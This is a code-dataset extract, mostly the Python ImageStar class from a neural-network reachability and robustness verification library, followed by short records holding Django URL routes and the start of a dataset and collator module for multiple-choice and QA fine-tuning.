self.attributes[HEIGHT_ID] and img_size[1] == self.attributes[WIDTH_ID] and self.attributes[NUM_CHANNEL_ID] == 1), 'error: %s' % ERRMSG_INCONSISTENT_IMGDIM_IMGSTAR\n        elif len(img_size) == 3:\n            assert (img_size[0] == self.attributes[HEIGHT_ID] and img_size[1] == self.attributes[WIDTH_ID] and img_size[2] == self.attributes[NUM_CHANNEL_ID]), 'error: %s' % ERRMSG_INCONSISTENT_IMGDIM_IMGSTAR\n        else:\n            raise Exception('error: %s' % ERRMSG_INVALID_INPUT_IMG)\n        \n        image_vec = image.flatten(order=self.attributes[FLATTEN_ORDER_ID])\n        \n        # TODO: error: failed to create Star set\n        S = self.to_star()\n        \n        return S.contains(image_vec)\n        \n    def project2D(self, point1, point2):\n        \"\"\"\n        Projects the ImageStar on the given plane\n        \n        point1 : int -> first dimension index\n        point2 : int -> second dimension index\n        return -> projected Star\n        \"\"\"\n        \n        assert (len(point1) == 3 and len(point2) == 3), 'error: %s' % ERRMSG_INVALID_INPUT_POINT\n        assert self.validate_point_dim(point1, self.attributes[HEIGHT_ID], self.attributes[WIDTH_ID]), 'error: %s' % ERRMSG_INVALID_FIRST_INPUT_POINT\n        assert self.validate_point_dim(point2, self.attributes[HEIGHT_ID], self.attributes[WIDTH_ID]), 'error: %s' % ERRMSG_INVALID_SECOND_INPUT_POINT\n        \n        # the points are given 1-indexed (MATLAB convention); shift to 0-indexed\n        point1 -= 1\n        point2 -= 1\n        \n        n = self.attributes[NUMPRED_ID] + 1\n        \n        new_V = np.zeros((2, n))\n        \n        for i in range(n):\n            new_V[0, i] = self.attributes[V_ID][point1[0], point1[1], point1[2], i]\n            new_V[1, i] = self.attributes[V_ID][point2[0], point2[1], point2[2], i]\n        \n        return Star(new_V, self.attributes[C_ID], self.attributes[D_ID], self.attributes[PREDLB_ID], self.attributes[PREDUB_ID])\n        \n    \n    def get_range(self, *args):\n        \"\"\"\n        Gets ranges of a state at specific position using the Gurobi solver\n        \n        args : np.array([params]) -> multiple parameters that include =>\n            vert_id : int -> vertical index\n            horiz_id : int -> horizontal index\n            channel_id : int -> channel index\n            \n            \n        \n        return : np.array([\n            xmin : int -> min of (vert_id, horiz_id, channel_id),\n            xmax : int -> max of (vert_id, horiz_id, channel_id)\n            ])\n        \"\"\"\n        \n        assert (len(args) == DEFAULT_SOLVER_ARGS_NUM or len(args) == CUSTOM_SOLVER_ARGS_NUM), 'error: get_range expects (vert_id, horiz_id, channel_id) plus an optional solver option' \n        assert (not self.isempty(self.attributes[C_ID]) and not self.isempty(self.attributes[D_ID])), 'error: %s' % ERRMSG_IMGSTAR_EMPTY\n        \n        # TODO: THIS SHOULD BE ACCOUNTED FOR WHEN THE DATA IS PASSED\n        # input_args = np.array([\n        #     
args[VERT_ID] - 1,\n        #     args[HORIZ_ID] - 1,\n        #     args[CHANNEL_ID] - 1\n        #     ], dtype=int)\n        \n        #input_args = input_args + 1\n        \n        # TODO: account for potential custom solver identifier\n        #args = input_args\n        \n        assert (args[VERT_ID] > -1 and args[VERT_ID] < self.attributes[HEIGHT_ID]), 'error: %s' % ERRMSG_INVALID_VERT_ID\n        assert (args[HORIZ_ID] > -1 and args[HORIZ_ID] < self.attributes[WIDTH_ID]), 'error: %s' % ERRMSG_INVALID_HORIZ_ID\n        assert (args[CHANNEL_ID] > -1 and args[CHANNEL_ID] < self.attributes[NUM_CHANNEL_ID]), 'error: %s' % ERRMSG_INCONSISTENT_CHANNELS_NUM\n        \n        f = self.attributes[V_ID][args[VERT_ID], args[HORIZ_ID], args[CHANNEL_ID], 1:self.attributes[NUMPRED_ID] + 1]\n        \n        if (f == 0).all():\n            # the pixel does not depend on the predicates: the range collapses to the center value\n            xmin = self.attributes[V_ID][args[VERT_ID], args[HORIZ_ID], args[CHANNEL_ID], 0]\n            xmax = self.attributes[V_ID][args[VERT_ID], args[HORIZ_ID], args[CHANNEL_ID], 0]\n        else:\n            min_ = gp.Model()\n            min_.Params.LogToConsole = 0\n            min_.Params.OptimalityTol = 1e-9\n            if self.attributes[PREDLB_ID].size and self.attributes[PREDUB_ID].size:\n                x = min_.addMVar(shape=self.attributes[NUMPRED_ID], lb=self.attributes[PREDLB_ID], ub=self.attributes[PREDUB_ID])\n            else:\n                x = min_.addMVar(shape=self.attributes[NUMPRED_ID])\n            min_.setObjective(f @ x, GRB.MINIMIZE)\n            # gurobipy's matrix API accepts the dense constraint matrix directly\n            # (scipy.sparse is not imported in this module)\n            C = self.attributes[C_ID]\n            d = np.array(self.attributes[D_ID]).flatten(order=self.attributes[FLATTEN_ORDER_ID])\n            min_.addConstr(C @ x <= d)\n            min_.optimize()\n\n            if min_.status == 2:\n                xmin = min_.objVal + self.attributes[V_ID][args[VERT_ID], args[HORIZ_ID], args[CHANNEL_ID], 0]\n            else:\n                raise Exception('error: cannot find an optimal solution, exitflag = %d' % (min_.status))\n\n            max_ = gp.Model()\n            max_.Params.LogToConsole = 0\n            max_.Params.OptimalityTol = 1e-9\n            if self.attributes[PREDLB_ID].size and self.attributes[PREDUB_ID].size:\n                x = max_.addMVar(shape=self.attributes[NUMPRED_ID], lb=self.attributes[PREDLB_ID], ub=self.attributes[PREDUB_ID])\n            else:\n                x = max_.addMVar(shape=self.attributes[NUMPRED_ID])\n            max_.setObjective(f @ x, GRB.MAXIMIZE)\n            C = self.attributes[C_ID]\n            d = np.array(self.attributes[D_ID]).flatten(order=self.attributes[FLATTEN_ORDER_ID])\n            max_.addConstr(C @ x <= d)\n            max_.optimize()\n\n            if max_.status == 2:\n                xmax = max_.objVal + self.attributes[V_ID][args[VERT_ID], args[HORIZ_ID], args[CHANNEL_ID], 0]\n            else:\n                raise Exception('error: cannot find an optimal solution, exitflag = %d' % (max_.status))\n\n        return np.array([xmin, xmax])\n\n    def estimate_range(self, height_id, width_id, channel_id):\n        \"\"\"\n        Estimates a range using only the predicate bounds information\n        \n        h : int -> height index\n        w : int -> width index\n        c : int -> channel index\n        \n        return -> [xmin, xmax]\n        \"\"\"\n\n        assert (not self.isempty(self.attributes[C_ID]) and not self.isempty(self.attributes[D_ID])), 'error: %s' % ERRMSG_IMGSTAR_EMPTY\n        \n        height_id = int(height_id)\n        width_id = int(width_id)\n        channel_id = int(channel_id)\n        \n        assert (height_id > -1 and height_id < self.attributes[HEIGHT_ID]), 'error: %s' % ERRMSG_INVALID_VERT_ID\n        assert (width_id > -1 and width_id < self.attributes[WIDTH_ID]), 'error: %s' % ERRMSG_INVALID_HORIZ_ID\n        assert (channel_id > -1 and channel_id < self.attributes[NUM_CHANNEL_ID]), 'error: %s' % ERRMSG_INVALID_CHANNEL_ID  \n        \n        f = self.attributes[V_ID][height_id, width_id, channel_id, 0:self.attributes[NUMPRED_ID] + 1]\n        xmin = f[0]\n        xmax = f[0]\n        \n        for i in range(1, self.attributes[NUMPRED_ID] + 1):\n            if f[i] >= 0:\n                xmin 
= xmin + f[i] * self.attributes[PREDLB_ID][i - 1]\n xmax = xmax + f[i] * self.attributes[PREDUB_ID][i - 1]\n else:\n xmin = xmin + f[i] * self.attributes[PREDUB_ID][i - 1]\n xmax = xmax + f[i] * self.attributes[PREDLB_ID][i - 1]\n\n return np.array([xmin, xmax])\n\n def estimate_ranges(self, dis_opt = DEFAULT_DISP_OPTION):\n \"\"\"\n Estimates the ranges using only a predicate bound information\n \n dis_opt : string -> display option\n \n return -> [image_lb, image_ub]\n \"\"\"\n \n assert (not self.isempty(self.attributes[C_ID]) and not self.isempty(self.attributes[D_ID])), 'error: %s' % ERRMSG_IMGSTAR_EMPTY\n \n if self.isempty(self.attributes[IM_LB_ID]) or self.isempty(self.attributes[IM_UB_ID]):\n image_lb = np.zeros((self.attributes[HEIGHT_ID], self.attributes[WIDTH_ID], self.attributes[NUM_CHANNEL_ID]))\n image_ub = np.zeros((self.attributes[HEIGHT_ID], self.attributes[WIDTH_ID], self.attributes[NUM_CHANNEL_ID]))\n \n size = self.attributes[HEIGHT_ID] * self.attributes[WIDTH_ID] * self.attributes[NUM_CHANNEL_ID]\n \n disp_flag = False\n if dis_opt == DISPLAY_ON_OPTION:\n disp_flag = True\n print(ESTIMATE_RANGE_STAGE_STARTED)\n \n for i in range(self.attributes[HEIGHT_ID]):\n for j in range(self.attributes[WIDTH_ID]):\n for k in range(self.attributes[NUM_CHANNEL_ID]):\n image_lb[i, j, k], image_ub[i, j, k] = self.estimate_range(i, j, k)\n \n if disp_flag:\n print(ESTIMATE_RANGE_STAGE_OVER)\n \n self.attributes[IM_LB_ID] = image_lb\n self.attributes[IM_UB_ID] = image_ub\n else:\n image_lb = self.attributes[IM_LB_ID]\n image_ub = self.attributes[IM_UB_ID]\n \n return np.array([image_lb, image_ub])\n \n def get_ranges(self, dis_opt = DEFAULT_DISP_OPTION):\n \"\"\"\n Computes the lower and upper bound images of the ImageStar\n \n return -> [image_lb : np.array([]) -> lower bound image,\n image_ub : np.array([]) -> upper bound image]\n \"\"\"\n \n image_lb = np.zeros((self.attributes[HEIGHT_ID], self.attributes[WIDTH_ID], self.attributes[NUM_CHANNEL_ID]))\n image_ub = np.zeros((self.attributes[HEIGHT_ID], self.attributes[WIDTH_ID], self.attributes[NUM_CHANNEL_ID]))\n\n size = self.attributes[HEIGHT_ID] * self.attributes[WIDTH_ID] * self.attributes[NUM_CHANNEL_ID]\n \n disp_flag = False\n if dis_opt == DISPLAY_ON_OPTION:\n disp_flag = True\n print(ESTIMATE_RANGE_STAGE_STARTED)\n \n for i in range(self.attributes[HEIGHT_ID]):\n for j in range(self.attributes[WIDTH_ID]):\n for k in range(self.attributes[NUM_CHANNEL_ID]):\n image_lb[i, j, k], image_ub[i, j, k] = self.get_range(i, j, k)\n \n if disp_flag:\n print(ESTIMATE_RANGE_STAGE_OVER)\n \n self.attributes[IM_LB_ID] = image_lb\n self.attributes[IM_UB_ID] = image_ub\n \n return np.array([image_lb, image_ub])\n \n def update_ranges(self, *args):\n \"\"\"\n Updates local ranges for the MaxPooling operation\n \n points : np.array([*]) -> local points = [x1 y1 c1; x2 y2 c2; ...]\n \"\"\"\n updated_ranges = []\n \n for i in range(len(args[POINTS_ID])):\n updated_ranges.append(self.get_range(args[POINTS_ID][i][0], args[POINTS_ID][i][1], args[POINTS_ID][i][2]))\n \n return updated_ranges\n \n \n \n def get_num_attacked_pixels(self):\n \"\"\"\n Computes the number of attacked pixels in the ImageStar\n \n return : int -> the number of pixels\n \"\"\"\n \n V1 = np.zeros((self.attributes[HEIGHT_ID], self.attributes[WIDTH_ID], self.attributes[NUM_CHANNEL_ID]))\n V3 = V1\n \n for i in range(1, self.attributes[NUMPRED_ID] + 1):\n V2 = (self.attributes[V_ID][:,:,:,i] != V1)\n V3 = V3 + V2\n \n V4 = np.amax(V3, 2)\n return sum(sum(V4))\n \n def 
get_local_bound(self, *args):\n        \"\"\"\n        Computes the local bound for the Max Pooling operation\n        \n        args : np.array([]) that includes =>\n            start_point : np.array([x1, y1]) -> the start point of the local (partial) image\n            pool_size : np.array([height, width]) -> the height and width of max pooling\n            channel_id : int -> the index of the channel\n            \n        return : [lb : np.array([*]) -> the lower bound of all points in the local region,\n                  ub : np.array([*]) -> the upper bound of all points in the local region]\n        \n        \"\"\"\n        \n        points = self.get_local_points(args[START_POINT_ID], args[POOL_SIZE_ID])\n        points_num = len(points)\n        \n        if self.isempty(self.attributes[IM_LB_ID]) or self.isempty(self.attributes[IM_UB_ID]):\n            image_lb, image_ub = self.get_ranges()\n        else:\n            image_lb = self.attributes[IM_LB_ID]\n            image_ub = self.attributes[IM_UB_ID]\n        \n        # note: the bounds below are read from the last channel; the channel_id\n        # listed in the docstring is not consumed by this implementation\n        lb = image_lb[int(points[0,0]), int(points[0,1]), self.attributes[NUM_CHANNEL_ID] - 1]\n        ub = image_ub[int(points[0,0]), int(points[0,1]), self.attributes[NUM_CHANNEL_ID] - 1]\n        \n        for i in range(1, points_num):\n            if image_lb[int(points[i,0]), int(points[i,1]), self.attributes[NUM_CHANNEL_ID] - 1] < lb:\n                lb = image_lb[int(points[i,0]), int(points[i,1]), self.attributes[NUM_CHANNEL_ID] - 1]\n            \n            if image_ub[int(points[i,0]), int(points[i,1]), self.attributes[NUM_CHANNEL_ID] - 1] > ub:\n                ub = image_ub[int(points[i,0]), int(points[i,1]), self.attributes[NUM_CHANNEL_ID] - 1]\n        \n        return [lb, ub]\n    \n    def get_local_points(self, start_point, pool_size):\n        \"\"\"\n        Computes all local points indices for Max Pooling operation\n        \n        start_point : np.array([x1, y1]) -> the start point of the local (partial) image\n        pool_size : np.array([height, width]) -> the height and width of max pooling\n        \n        returns : np.array([*]) -> all indices of the points for a single max pooling operation\n                  (including the start point)\n        \"\"\"\n        \n        x0 = start_point[0] # vertical index of the startpoint\n        y0 = start_point[1] # horizontal index of the startpoint\n        \n        h = pool_size[0] # height of the MaxPooling layer\n        w = pool_size[1] # width of the MaxPooling layer\n        \n        assert (x0 >= 0 and y0 >= 0 and x0 + h - 1 < self.attributes[HEIGHT_ID] \\\n                and y0 + w - 1 < self.attributes[WIDTH_ID]), \\\n               'error: invalid start point or pool size, the local region falls outside the image' \n        \n        points = np.zeros((h * w, 2))\n        \n        for i in range(h):\n            if i == 0:\n                x1 = x0\n            else:\n                x1 = x1 + 1\n            \n            for j in range(w):\n                if j == 0:\n                    y1 = y0\n                else:\n                    y1 = y1 + 1\n                \n                points[i * w + j, :] = np.array([x1, y1])\n        \n        return points\n    \n    def get_localMax_index(self, *args):\n        \"\"\"\n        Gets local max index. 
Attempts to find the maximum point of the local image.\n        It's used in over-approximate reachability analysis of the maxpooling operation\n        \n        start_point : np.array([int, int]) -> start point of the local image\n        pool_size : np.array([int, int]) -> the height and width of the max pooling layer\n        channel_id : int -> the channel index\n        \n        return -> max_id\n        \"\"\"\n        \n        points = self.get_local_points(args[START_POINT_ID], args[POOL_SIZE_ID])\n        \n        if self.isempty(self.attributes[IM_LB_ID]) or self.isempty(self.attributes[IM_UB_ID]):\n            self.estimate_ranges()\n        \n        height = args[POOL_SIZE_ID][0]\n        width = args[POOL_SIZE_ID][1]  # width comes from the second pool dimension\n        size = height * width\n        \n        lb = np.zeros((size, 1))\n        ub = np.zeros((size, 1))\n        \n        for i in range(size):\n            current_point = points[i, :].astype(int)\n            \n            lb[i] = self.attributes[IM_LB_ID][current_point[0], current_point[1], args[CHANNEL_ID] - 1]\n            ub[i] = self.attributes[IM_UB_ID][current_point[0], current_point[1], args[CHANNEL_ID] - 1]\n        \n        \n        [max_lb_id, max_lb_val] = max(enumerate(lb), key=operator.itemgetter(1))\n        \n        a = np.argwhere((ub - max_lb_val) > 0)[:,0]\n        a1 = np.argwhere((ub - max_lb_val) >= 0)[:,0]\n        a = np.delete(a, np.argwhere(a==max_lb_id)[:,0])\n        \n        if self.isempty(a):\n            max_id = points[max_lb_id, :]\n        else:\n            candidates = a1\n            \n            candidates_num = len(candidates)\n            \n            new_points = []\n            new_points1 = np.zeros((candidates_num, 2))\n            \n            for i in range(candidates_num):\n                selected_points = points[candidates[i], :]\n                new_points.append(np.append(selected_points, args[CHANNEL_ID] - 1))\n                new_points1[i, :] = selected_points\n            \n            self.update_ranges(new_points)\n            \n            lb = np.zeros((candidates_num,1))\n            ub = np.zeros((candidates_num,1))\n            \n            for i in range(candidates_num):\n                #TODO: THIS SHOULD BE INITIALLY INT\n                current_point = points[candidates[i], :]\n                \n                lb[i] = self.attributes[IM_LB_ID][int(current_point[0]), int(current_point[1]), int(args[CHANNEL_ID])]\n                ub[i] = self.attributes[IM_UB_ID][int(current_point[0]), int(current_point[1]), int(args[CHANNEL_ID])]\n            \n            [max_lb_id, max_lb_val] = max(enumerate(lb), key=operator.itemgetter(1))\n            \n            a = np.argwhere((ub - max_lb_val) > 0)[:,0]\n            a = np.delete(a, np.argwhere(a==max_lb_id)[:,0])\n            \n            if self.isempty(a):\n                max_id = new_points1[max_lb_id, :]\n            else:\n                candidates1 = np.argwhere((ub - max_lb_val) >= 0)[:,0]\n                max_id = new_points1[max_lb_id, :]\n                \n                candidates1 = np.delete(candidates1, np.argwhere(candidates1 == max_lb_id)[:,0])\n                candidates_num = len(candidates1)\n                \n                max_id1 = max_id\n                \n                for j in range(candidates_num):\n                    p1 = new_points1[candidates1[j], :]\n                    \n                    if self.is_p1_larger_p2(np.array([p1[0], p1[1], args[CHANNEL_ID]]), \\\n                                            np.array([max_id[0], max_id[1], args[CHANNEL_ID]])):\n                        max_id1 = np.vstack((max_id1, p1))\n                \n                \n                max_id = max_id1\n                \n                print('\\nThe local image has %d max candidates' % np.size(max_id, 0))\n        \n        return np.append(max_id, args[CHANNEL_ID] * np.zeros((len(max_id.shape)))).tolist()\n
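\n    # Editor's note: when the estimated bounds cannot single out one maximum,\n    # get_localMax_index returns several candidate points, and the max-pooling\n    # reachability that calls it over-approximates by keeping all of them.\n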
def get_localMax_index2(self, start_point, pool_size, channel_id):\n \"\"\"\n Gets local max index. Attempts to find the maximum point of the local image.\n It's used in over-approximate reachability analysis of the maxpooling operation\n \n startpoints : np.array([int, int]) -> startpoint of the local image\n pool_size : np.array([int, int]) -> the height and width of the max pooling layer\n channel_id : int -> the channel index\n \n return -> max_id\n \"\"\"\n \n points = self.get_local_points(start_point, pool_size)\n \n height = pool_size[0]\n width = pool_size[1]\n size = height * width\n \n lb = np.zeros((size,1))\n ub = np.zeros((size,1))\n \n for i in range(size):\n current_point = points[i, :].astype(int)\n \n lb[i] = self.attributes[IM_LB_ID][current_point[0], current_point[1], channel_id]\n ub[i] = self.attributes[IM_UB_ID][current_point[0], current_point[1], channel_id]\n \n [max_lb_id, max_lb_val] = max(enumerate(lb), key=operator.itemgetter(1))\n \n max_id = np.argwhere((ub - max_lb_val) > 0)[:,0]\n \n # append the channel index to each candidate before returning\n return np.append(max_id, channel_id * np.ones(len(max_id))).tolist()\n\n def add_max_id(self, name, max_id):\n \"\"\"\n Adds a matrix used for unmaxpooling reachability\n \n name : string -> name of the max pooling layer\n max_id : np.array([*int]) -> max indices\n \"\"\"\n \n #TODO: WHAT IS 'A' in NNV?\n raise Exception(\"unimplemented\")\n \n def update_max_id(self, name, max_id, pos):\n \"\"\"\n Updates a matrix used for unmaxpooling reachability\n \n name : string -> name of the max pooling layer\n max_id : np.array([*int]) -> max indices\n pos : np.array([]) -> the position of the local pixel of the max map\n corresponding to the max_id\n \"\"\"\n \n ids_num = len(self.attributes[MAX_IDS])\n \n unk_layer_num = 0\n \n for i in range(ids_num):\n if self.attributes[MAX_IDS][i].get_name() == name:\n self.attributes[MAX_IDS][i].get_max_ids()[pos[0], pos[1], pos[2]] = max_id\n break\n else:\n unk_layer_num += 1\n \n if unk_layer_num == ids_num:\n raise Exception('error: %s' % ERRMSG_UNK_NAME_MAX_POOL_LAYER)\n\n def add_input_size(self, name, input_size):\n \"\"\"\n Adds a matrix used for unmaxpooling reachability\n \n name : string -> name of the max pooling layer\n input_size : np.array([*int]) -> input size of the original image\n \"\"\"\n \n #TODO: WHAT IS 'A' in NNV? \n raise Exception(\"unimplemented\")\n 
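# --- Hedged sketch: add_max_id and update_max_id above are left unimplemented in the
# source (the TODOs reference NNV). A minimal stand-in registry keyed by layer name
# could look like this; the dict layout is our assumption, not the NNV data model.
import numpy as np

class MaxIdRegistry:
    def __init__(self):
        self._ids = {}  # layer name -> array of max indices per max-map pixel

    def add(self, name, max_id):
        self._ids[name] = np.asarray(max_id, dtype=object)

    def update(self, name, max_id, pos):
        if name not in self._ids:
            raise KeyError('unknown max pooling layer: %s' % name)
        self._ids[name][pos[0], pos[1], pos[2]] = max_id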
def is_p1_larger_p2(self, *args):\n \"\"\"\n Compares two specific points in the image. Checks if p1 > p2 is feasible.\n Can be used in max pooling operation\n \n p1 : np.array([*int]) - the first point = [h1, w1, c1]\n p2 : np.array([*int]) - the second point = [h2, w2, c2], where\n h - height, w - width, c - channel id\n \n return : bool -> 1 if p1 > p2 is feasible,\n 0 if p1 > p2 is not feasible\n \n \"\"\"\n \n C1 = np.zeros(self.attributes[NUMPRED_ID])\n \n for i in range(1, self.attributes[NUMPRED_ID] + 1):\n C1[i-1] = self.attributes[V_ID][args[P2_ID][0], args[P2_ID][1], args[P2_ID][2], i] - \\n self.attributes[V_ID][args[P1_ID][0], args[P1_ID][1], args[P1_ID][2], i]\n \n # TODO: WHY DOESN'T THE SUBTRAHEND HAVE THE 4-TH COMPONENT INDEXING IN NNV?\n d1 = self.attributes[V_ID][args[P1_ID][0], args[P1_ID][1], args[P1_ID][2], 0] - \\n self.attributes[V_ID][args[P2_ID][0], args[P2_ID][1], args[P2_ID][2], 0]\n \n new_C = np.vstack((self.attributes[C_ID], C1))\n new_d = np.vstack((self.attributes[D_ID], d1))\n \n S = Star(self.attributes[V_ID], new_C, new_d, self.attributes[PREDLB_ID], self.attributes[PREDUB_ID])\n\n if S.isEmptySet():\n return 0\n else:\n return 1\n \n def is_max(self, *args):\n \"\"\"\n Checks if a pixel value is the maximum value compared with the other ones.\n Implements one of the core steps of the maxpooling operation over\n the ImageStar\n \n max_map -> the current max_map of the ImageStar\n ori_image -> the original ImageStar to compute the max_map\n center -> the center pixel position that is checked\n center = [x1, y1, c1]\n others -> the positions of the pixels we want to compare the center against\n others = [x2, y2, c2; x3, y3, c3]\n out_image : ImageStar -> the updated input image\n \n return -> a new predicate\n \"\"\"\n \n size = args[OTHERS_ID].shape[0]\n \n new_C = np.zeros((size, args[MAX_MAP_ID].get_num_pred()))\n new_d = np.zeros((size, 1))\n \n for i in range(size):\n # encode others[i] <= center over the predicate variables\n new_d[i] = args[ORI_IMAGE_ID].get_V()[args[CENTER_ID][0], args[CENTER_ID][1], args[CENTER_ID][2], 0] - \\n args[ORI_IMAGE_ID].get_V()[args[OTHERS_ID][i][0], args[OTHERS_ID][i][1], args[OTHERS_ID][i][2], 0]\n \n for j in range(args[MAX_MAP_ID].get_num_pred()):\n new_C[i, j] = args[ORI_IMAGE_ID].get_V()[args[OTHERS_ID][i][0], args[OTHERS_ID][i][1], args[OTHERS_ID][i][2], j + 1] - \\n args[ORI_IMAGE_ID].get_V()[args[CENTER_ID][0], args[CENTER_ID][1], args[CENTER_ID][2], j + 1]\n \n C1 = np.vstack((args[MAX_MAP_ID].get_C(), new_C))\n d1 = np.vstack((args[MAX_MAP_ID].get_D(), new_d))\n \n # TODO: remove redundant constraints here\n \n return C1, d1\n \n def reshape(self, input, new_shape):\n \"\"\"\n Reshapes the ImageStar\n \n input : ImageStar -> the input ImageStar\n new_shape : np.array([]) -> new shape\n \n return -> a reshaped ImageStar\n \"\"\"\n \n assert np.size(new_shape) == 3, 'error: %s' % ERRMSG_INVALID_NEW_SHAPE\n \n assert np.prod(new_shape) == input.get_height() * input.get_width() * input.get_num_channel(), \\n 'error: %s' % ERRMSG_SHAPES_INCONSISTENCY\n \n new_V = np.reshape(input.get_V(), (*new_shape, input.get_num_pred() + 1))\n \n return ImageStar(new_V, input.get_C(), input.get_d(), \\n input.get_pred_lb(), input.get_pred_ub(),\n input.get_im_lb(), input.get_im_ub())\n 
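# --- Hedged sketch of the constraint trick used by is_p1_larger_p2: with pixels
# written as affine forms p = c + V @ a over the predicate variables a, "p1 > p2 is
# feasible" is checked by stacking the row (V2 - V1) a <= c1 - c2 onto the predicate
# constraints C a <= d and testing emptiness. The toy numbers below are ours.
import numpy as np

c1, V1 = 1.0, np.array([1.0, 0.0])   # p1 = 1.0 + a0
c2, V2 = 0.5, np.array([0.0, 1.0])   # p2 = 0.5 + a1
C = np.vstack([np.eye(2), -np.eye(2)])             # box constraints |a_i| <= 1
d = np.ones((4, 1))
new_C = np.vstack([C, (V2 - V1).reshape(1, -1)])   # a1 - a0 <= c1 - c2
new_d = np.vstack([d, [[c1 - c2]]])
# Feasibility of (new_C, new_d) would then be decided with an LP solver, as the
# Star.isEmptySet() call does above.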
def add_constraints(self, input, p1, p2):\n \"\"\"\n Adds a new constraint to predicate variables of an ImageStar\n used for finding counter examples. Adds a new constraint: p2 >= p1\n \n input : ImageStar -> an input ImageStar\n p1 : np.array([]) -> first point position\n p2 : np.array([]) -> second point position\n new_C : np.array([]) -> a new predicate constraint matrix C\n new_d : new predicate constraint vector\n \n return -> [new_C, new_d] - a new predicate\n \"\"\"\n \n assert isinstance(input, ImageStar), 'error: %s' % ERRMSG_INPUT_NOT_IMAGESTAR\n \n # encode p2 >= p1, i.e. p1 - p2 <= 0, over the predicate variables\n new_d = input.get_V()[p2[0], p2[1], p2[2], 0] - input.get_V()[p1[0], p1[1], p1[2], 0]\n new_C = input.get_V()[p1[0], p1[1], p1[2], 1:input.get_num_pred() + 1] - \\n input.get_V()[p2[0], p2[1], p2[2], 1:input.get_num_pred() + 1]\n \n new_C = np.reshape(new_C, (1, input.get_num_pred()))\n \n new_C = np.vstack((input.get_C(), new_C))\n new_d = np.vstack((input.get_d(), new_d))\n \n return new_C, new_d\n \n##################### GET/SET METHODS #####################\n \n def get_V(self):\n \"\"\"\n return -> the center and the basis matrix of the ImageStar\n \"\"\"\n \n return self.attributes[V_ID]\n \n########################## UTILS ##########################\n\n def validate_params(self, params):\n for param in params:\n assert isinstance(param, np.ndarray), 'error: ImageStar does not support parameters of type = %s' % type(param)\n\n def isempty_init(self, *params):\n flag = True\n \n for param in params:\n flag = self.isempty(np.array(param))\n \n if flag == False:\n break\n \n return flag\n \n def isempty(self, param):\n return param.size == 0 or (isinstance(param, np.ndarray) and param.shape[0] == 0)\n \n def init_empty_imagestar(self):\n for i in range(len(self.attributes)):\n if self.is_scalar_attribute(i):\n self.attributes[i] = 0\n else:\n self.attributes[i] = np.array([])\n\n def copy_deep(self, imagestar):\n for i in range(len(self.attributes)):\n self.attributes[i] = imagestar.get_attribute(i)\n\n def validate_point_dim(self, point, height, width):\n return (point[0] > -1) and (point[0] < self.attributes[HEIGHT_ID]) and \\n (point[1] > -1) and (point[1] < self.attributes[WIDTH_ID]) and \\n (point[2] > -1) and (point[2] < self.attributes[NUM_CHANNEL_ID])\n\n def offset_args(self, args, offset):\n result = []\n \n for i in range(len(args) + offset):\n result.append(np.array([]))\n \n if i >= offset:\n result[i] = args[i - offset]\n \n return result\n \n def is_scalar(self, param):\n return not isinstance(param, np.ndarray)\n \n def is_scalar_attribute(self, attribute_id):\n return attribute_id in self.scalar_attributes_ids\n","repo_name":"V2A2/StarV_temp","sub_path":"engine/set/imagestar/imagestar.py","file_name":"imagestar.py","file_ext":"py","file_size_in_byte":50946,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"5523709196","text":"from django.urls import path\n\nfrom . 
import views\n\napp_name = 'layout'\nurlpatterns = [\n path('submit/', views.layout_submit, name='submit'),\n path('submit/validate/', views.validate_layout_submit, name='validate_submit'),\n path('confirm//', views.confirmed_layout, name='confirm'),\n path('review//', views.review_layout, name='review'),\n path('review//validate/', views.validate_review_layout, name='validate_review'),\n]\n","repo_name":"HiSPARC/publicdb","sub_path":"publicdb/station_layout/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"34557166978","text":"from dataclasses import dataclass\nfrom typing import Dict, Optional, Union\nfrom itertools import chain\nfrom pathlib import Path\nimport json\nfrom collections import defaultdict\nfrom abc import ABC, abstractmethod\n\nimport torch\nimport pandas as pd\nimport numpy as np \n\nfrom datasets import load_dataset\nfrom transformers import BertTokenizerFast\n\nfrom utils import mask_tokens\n\n@dataclass\nclass DataCollatorForMultipleChoice:\n is_train: bool\n tokenizer: BertTokenizerFast\n\n def __call__(self, features):\n batch = defaultdict(list)\n for feature in features:\n for k, v in feature.items():\n batch[k].append(v)\n batch = dict(map(lambda x: (x[0], torch.tensor(x[1]))if x[0] != 'ids' else (x[0], x[1]), dict(batch).items()))\n\n special_tokens_mask = batch.pop('special_tokens_mask')\n if self.is_train:\n batch['input_ids'] = mask_tokens(batch['input_ids'],\n paragraph_indices=(batch['token_type_ids'] &\n ~special_tokens_mask).bool(),\n mask_id=self.tokenizer.mask_token_id, mask_prob=0.15)\n return batch\n\nclass DataCollatorForQA:\n def __call__(self, features):\n batch = defaultdict(list)\n for feature in features:\n for k, v in feature.items():\n batch[k].append(v)\n batch = dict(map(lambda x: (x[0], torch.tensor(x[1]))if x[0] not in ['example_id', 'offset_mapping'] else (x[0], x[1]), dict(batch).items()))\n return batch\n\nclass BaseDataset(ABC):\n def __init__(self,\n context_path: str,\n paddings: bool,\n max_length: int,\n tokenizer: BertTokenizerFast,\n is_train = True,\n **kwargs\n ) -> None:\n self.paddings = \"max_length\" if paddings else False\n self.max_length = max_length\n self.tokenizer = tokenizer\n self.is_train = is_train\n if self.is_train:\n self.convert_HFdata(context_path, kwargs['train_path'], kwargs['trainHF_path'])\n self.convert_HFdata(context_path, kwargs['validation_path'], kwargs['validationHF_path'])\n self.train_dataset, self.eval_dataset = self.preprocess(dict(train=kwargs['trainHF_path'], \n validation=kwargs['validationHF_path']))\n else:\n self.convert_HFdata(context_path, kwargs['test_path'], kwargs['testHF_path'])\n self.test_dataset = self.preprocess(dict(test=kwargs['testHF_path']))\n\n @abstractmethod\n def convert_HFdata(self):\n pass\n \n @abstractmethod\n def preprocess(self):\n pass\n\nclass MultipleChoiceDataset(BaseDataset):\n def __init__(self,\n context_path: str,\n paddings: bool,\n max_length: int,\n tokenizer: BertTokenizerFast,\n is_train: bool,\n **kwargs\n ) -> None:\n super(MultipleChoiceDataset, self).__init__(context_path, \n paddings, max_length, tokenizer, is_train, **kwargs)\n\n def prepare_feature(self, examples):\n ending_names = [\"paragraphs_0\", \"paragraphs_1\", \"paragraphs_2\", \"paragraphs_3\"]\n context_name = \"question\"\n label_column_name = 